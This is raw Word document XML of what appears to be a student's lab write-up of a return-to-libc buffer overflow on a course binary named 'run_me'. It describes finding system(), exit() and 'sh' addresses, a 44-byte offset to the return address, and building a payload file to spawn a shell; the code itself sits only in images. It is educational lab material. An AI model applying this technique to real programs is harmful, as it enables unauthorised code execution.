      <w:r>
        <w:t xml:space="preserve">Follow the step in workshop 6, firstly, get the address of system(), exit() and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55979446" w14:textId="613207DA" w:rsidR="005C388B" w:rsidRDefault="005C388B" w:rsidP="00236129">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D307F3B" w14:textId="55902A86" w:rsidR="00236129" w:rsidRDefault="00E3585C" w:rsidP="00236129">
      <w:r w:rsidRPr="008D1664">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16BC2AAD" wp14:editId="2D9BCF80">
            <wp:extent cx="5731510" cy="1398905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2853190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9033" name="Picture 1" descr="A black background with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1398905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="004504CD" w:rsidRPr="004504CD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A333A89" wp14:editId="3A59635A">
            <wp:extent cx="5207000" cy="2044700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2305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2624" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5207000" cy="2044700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF2E75" w14:textId="73142600" w:rsidR="008D1664" w:rsidRDefault="008D1664" w:rsidP="00236129">
      <w:r w:rsidRPr="008D1664">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6702D22C" wp14:editId="7245CBB5">
            <wp:extent cx="5334000" cy="660400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1726969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985" name="Picture 1" descr="A black background with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="660400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EA7911" w14:textId="0A538778" w:rsidR="002928F9" w:rsidRDefault="005C388B" w:rsidP="00236129">
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002E6725" w:rsidRPr="002E6725">
        <w:t>0xffffd458</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + 4)</w:t>
      </w:r>
      <w:r w:rsidR="002E6725">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="002E6725" w:rsidRPr="002E6725">
        <w:t>0xffffd430</w:t>
      </w:r>
      <w:r w:rsidR="002E6725">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="00430A09">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00430A09" w:rsidRPr="00430A09">
        <w:rPr>
          <w:color w:val="102535"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00430A09">
        <w:rPr>
          <w:color w:val="102535"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>so the distance from the beginning of buffer to </w:t>
      </w:r>
      <w:r w:rsidR="00430A09" w:rsidRPr="00430A09">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>RET</w:t>
      </w:r>
      <w:r w:rsidR="00430A09">
        <w:rPr>
          <w:color w:val="102535"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00430A09">
        <w:rPr>
          <w:color w:val="102535"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00430A09">
        <w:rPr>
          <w:color w:val="102535"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00430A09">
        <w:rPr>
          <w:color w:val="102535"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="00430A09">
        <w:rPr>
          <w:color w:val="102535"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes</w:t>
      </w:r>
      <w:r w:rsidR="00491A13">
        <w:rPr>
          <w:color w:val="102535"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, use 44 As to fill out the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D09DE" w14:textId="75904413" w:rsidR="00236129" w:rsidRDefault="002928F9" w:rsidP="00236129">
      <w:r w:rsidRPr="002928F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A909486" wp14:editId="6230A858">
            <wp:extent cx="5731510" cy="1394460"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="6581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958" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1394460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1990AE15" w14:textId="77777777" w:rsidR="00DB15B3" w:rsidRDefault="00895980" w:rsidP="00236129">
      <w:r>
        <w:t>Then, store the items into the file “payload” using python</w:t>
      </w:r>
      <w:r w:rsidR="00DB15B3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D129F2C" w14:textId="5A405B65" w:rsidR="00895980" w:rsidRDefault="00096AAC" w:rsidP="00236129">
      <w:r w:rsidRPr="00096AAC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71FF12A5" wp14:editId="2826C6AD">
            <wp:extent cx="5731510" cy="3211195"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="9169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5300" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3211195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64534540" w14:textId="0F0603E0" w:rsidR="00895980" w:rsidRDefault="00895980" w:rsidP="00236129">
      <w:r>
        <w:t>Furthermore, pass the payload file to the program “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>run_me</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00096AAC">
        <w:t xml:space="preserve">outside gdb </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to get the shell:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505A5E1" w14:textId="20E03857" w:rsidR="00236129" w:rsidRDefault="0000695F" w:rsidP="00236129">
      <w:r w:rsidRPr="0000695F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54DE2172" wp14:editId="2EE9C7BA">
            <wp:extent cx="5731510" cy="443865"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="207644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8862" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="443865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED00C8" w14:textId="46C5E79C" w:rsidR="0000695F" w:rsidRDefault="0000695F" w:rsidP="00236129">
      <w:r>
        <w:t>Look like need to shift 1 bit</w:t>
      </w:r>
      <w:r w:rsidR="007E4628">
        <w:t xml:space="preserve"> back (0xf6 to 0xf5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F8803" w14:textId="78BCB28C" w:rsidR="007E4628" w:rsidRDefault="007E4628" w:rsidP="00236129">
      <w:r w:rsidRPr="007E4628">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A1A9ADE" wp14:editId="1E9ED0AC">
            <wp:extent cx="5731510" cy="878840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21448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3504" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="878840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDB2C14" w14:textId="00F1DCD7" w:rsidR="007E4628" w:rsidRDefault="007E4628" w:rsidP="00236129">
      <w:r>
        <w:t>Finally get the answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166EC364" w14:textId="60870560" w:rsidR="007E4628" w:rsidRDefault="007E4628" w:rsidP="00236129">
      <w:r w:rsidRPr="007E4628">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E61851" wp14:editId="420DF791">
            <wp:extent cx="4370434" cy="2908620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54007202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2022" name="Picture 1" descr="A computer screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4488270" cy="2987043"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AD666E" w14:textId="723FFD04" w:rsidR="007E4628" w:rsidRPr="00615C03" w:rsidRDefault="007E4628" w:rsidP="007E4628">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007E4628" w:rsidRPr="00615C03">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5483" w14:textId="77777777" w:rsidR="00501ABC" w:rsidRDefault="00501ABC" w:rsidP="00461B7D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60D830B8" w14:textId="77777777" w:rsidR="00501ABC" w:rsidRDefault="00501ABC" w:rsidP="0046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4F53" w14:textId="77777777" w:rsidR="00501ABC" w:rsidRDefault="00501ABC" w:rsidP="00461B7D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59FEB478" w14:textId="77777777" w:rsidR="00501ABC" w:rsidRDefault="00501ABC" w:rsidP="0046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3D42" w14:textId="2D525E33" w:rsidR="005E4D00" w:rsidRDefault="005E4D00" w:rsidP="00461B7D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Xiao Liu a1878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E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE642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CF4D4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C04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B4F11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F39C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E31F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E78B8C4"/>
    <w:lvl w:ilvl="0" w:tplc="AF2EF180">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="1025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776422">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1963030354">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1288051359">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="302078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03"/>
    <w:rsid w:val="0000695F"/>
    <w:rsid w:val="00055FC3"/>
    <w:rsid w:val="00096AAC"/>
    <w:rsid w:val="000D14A5"/>
    <w:rsid w:val="00105D6F"/>
    <w:rsid w:val="00140708"/>
    <w:rsid w:val="001A7868"/>
    <w:rsid w:val="001E565D"/>
    <w:rsid w:val="00222A70"/>
    <w:rsid w:val="00236129"/>
    <w:rsid w:val="00247C55"/>
    <w:rsid w:val="002928F9"/>
    <w:rsid w:val="002B2EC4"/>
    <w:rsid w:val="002C0D8D"/>
    <w:rsid w:val="002C1E58"/>
    <w:rsid w:val="002E6725"/>
    <w:rsid w:val="0032184D"/>
    <w:rsid w:val="00337077"/>
    <w:rsid w:val="00380F06"/>
    <w:rsid w:val="003B639D"/>
    <w:rsid w:val="003E5EC7"/>
    <w:rsid w:val="00430A09"/>
    <w:rsid w:val="004504CD"/>
    <w:rsid w:val="004615BF"/>
    <w:rsid w:val="00461B7D"/>
    <w:rsid w:val="00491A13"/>
    <w:rsid w:val="00497BB3"/>
    <w:rsid w:val="00501ABC"/>
    <w:rsid w:val="00572EEB"/>
    <w:rsid w:val="005A39EE"/>
    <w:rsid w:val="005B68D2"/>
    <w:rsid w:val="005C388B"/>
    <w:rsid w:val="005E4D00"/>
    <w:rsid w:val="00615C03"/>
    <w:rsid w:val="00642635"/>
    <w:rsid w:val="006554B9"/>
    <w:rsid w:val="00657C59"/>
    <w:rsid w:val="00693F79"/>
    <w:rsid w:val="006957B8"/>
    <w:rsid w:val="00770DF0"/>
    <w:rsid w:val="007C71F1"/>
    <w:rsid w:val="007E4628"/>
    <w:rsid w:val="008005CB"/>
    <w:rsid w:val="00895980"/>
    <w:rsid w:val="008D1664"/>
    <w:rsid w:val="008F394D"/>
    <w:rsid w:val="00901C0A"/>
    <w:rsid w:val="00B03669"/>
    <w:rsid w:val="00B15E40"/>
    <w:rsid w:val="00B4442E"/>
    <w:rsid w:val="00BD1720"/>
    <w:rsid w:val="00BE4A45"/>
    <w:rsid w:val="00C1658E"/>
    <w:rsid w:val="00C224E8"/>
    <w:rsid w:val="00C42FC6"/>
    <w:rsid w:val="00D23155"/>
    <w:rsid w:val="00D7227F"/>
    <w:rsid w:val="00DB15B3"/>
    <w:rsid w:val="00E2653C"/>
    <w:rsid w:val="00E3585C"/>
    <w:rsid w:val="00E46659"/>
    <w:rsid w:val="00EC7B61"/>
    <w:rsid w:val="00EF52A7"/>
    <w:rsid w:val="00F069FA"/>
    <w:rsid w:val="00F32E36"/>
    <w:rsid w:val="00F5120B"/>
    <w:rsid w:val="00F72E10"/>
    <w:rsid w:val="00F80E74"/>
    <w:rsid w:val="00FD3C56"/>
    <w:rsid w:val="00FE4A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684C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{65971B34-2E18-8C4A-AA46-972ABFFF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7D"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="180" w:after="180" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D23155"/>
    <w:rPr>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D23155"/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00615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155"/>
    <w:rPr>
      <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
      <w:kern w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D23155"/>
    <w:rPr>
      <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
      <w:color w:val="156082" w:themeColor="accent1"/>
      <w:kern w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00615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C03"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="007C71F1"/>
    <w:pPr>
      <w:spacing w:after="80" w:line="36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C0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C03"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00615C03"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00615C03"/>
    <w:pPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00615C03"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00615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C03"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00615C03"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00615C03"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00615C03"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006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C03"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="module-sequence-footer-button--previous">
    <w:name w:val="module-sequence-footer-button--previous"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00615C03"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00615C03"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="module-sequence-footer-button--next">
    <w:name w:val="module-sequence-footer-button--next"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00615C03"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
